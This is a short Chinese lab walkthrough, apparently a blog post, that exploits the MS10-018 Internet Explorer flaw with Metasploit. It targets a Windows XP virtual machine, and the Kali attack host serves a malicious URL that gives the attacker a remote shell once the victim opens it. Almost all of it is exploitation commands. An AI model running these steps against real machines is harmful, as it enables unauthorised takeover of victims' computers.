环境介绍
攻击机:kali(ip:192.168.133.136)
靶机:winxp(ip:192.168.133.140)
靶机条件:关闭防火墙
利用过程
1.msfconsole集成了很多漏洞的利用脚本
msfconsole //漏洞利用
2.搜索ms10-018相关模块
search ms10-018
3.使用模块
use 0 //使用模块
4.设置目标ip或网段
set rhosts 192.168.133.140 //设置目标ip或网段
5.攻击,得到url:http://192.168.133.136:8080/xtygACVB1R
run/exploit //攻击
6.当xp的ie浏览器输入刚刚都得到的url,kali会得到反馈
7.查看已经成功获取的会话
sessions -i
8.利用会话
sessions -i -1
9.获取目标系统的shell
shell
总结
这个漏洞是利用ie浏览器的漏洞拿到主机的shell,只有当用户在ie浏览器使用了得到的url才能利用漏洞获取会话得到主机shell,否则会话建立不成功也就没办法继续渗透。
版权声明:本文为weixin_56291508原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。